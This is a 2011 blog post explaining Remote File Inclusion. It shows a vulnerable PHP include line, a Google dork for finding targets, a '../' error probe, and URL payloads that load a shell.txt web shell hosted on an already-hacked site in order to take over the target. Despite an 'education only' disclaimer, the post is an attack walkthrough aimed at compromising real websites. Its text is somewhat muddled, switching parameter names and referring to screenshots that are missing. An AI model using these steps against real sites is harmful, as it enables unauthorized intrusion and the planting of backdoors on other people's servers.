Monday, October 17, 2011

RFI (Remote File Inclusion)


Remote File Inclusion (RFI) is a type of vulnerability some websites. It allows an attacker to include a remote file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation. This can lead to Code execution on the web server.
The main cause is due to the use of unvalidated external variables , Most notable is the include statement.
The vuln. Code looks like:       

<?php
  include($_GET['page']);
?>
 

To attack you do is search for site:
Example using google dork inurl:php?page= or some kind of the url should be like:
www.site.com/somefile.php?page=www.somesite.com
well we wont find RFI vuln sites these days you may find 1 or 2 in a million or maybe not.this is for educational purpose only.but I will be explaining you with screenshots.

Step1:find the vuln site.
Then place ../ at the end of url (remove the content in page=) like this
Ex:www.site.com/somefile.php?page=../

If it shows some kind of error like :: 

Warning: file(../) [function.file]: failed to open stream: Permission denied in\\systemname\users\ in line.


Then it is vuln to RFI.
Sometimes if you are lucky directly check with inserting the other url .
Ex:www.site.com/file.php?page=www.google.com

Tats it now to take over this site all u need is a SHELL. A shell is like a unauthorized backdoor control panel of website.and it should be in the .txt extension

 (* im not responsible for any of your actions , for education purpose only.*)

Now put in the url like :: www.site.com/file.php?id=http://www.site.com/shell.txt

This shell.txt comes from other site which u have already hacked and uploaded the txt file.

You will find like this :::tada !



0 comments:

Post a Comment

Twitter Delicious Facebook Digg Stumbleupon Favorites More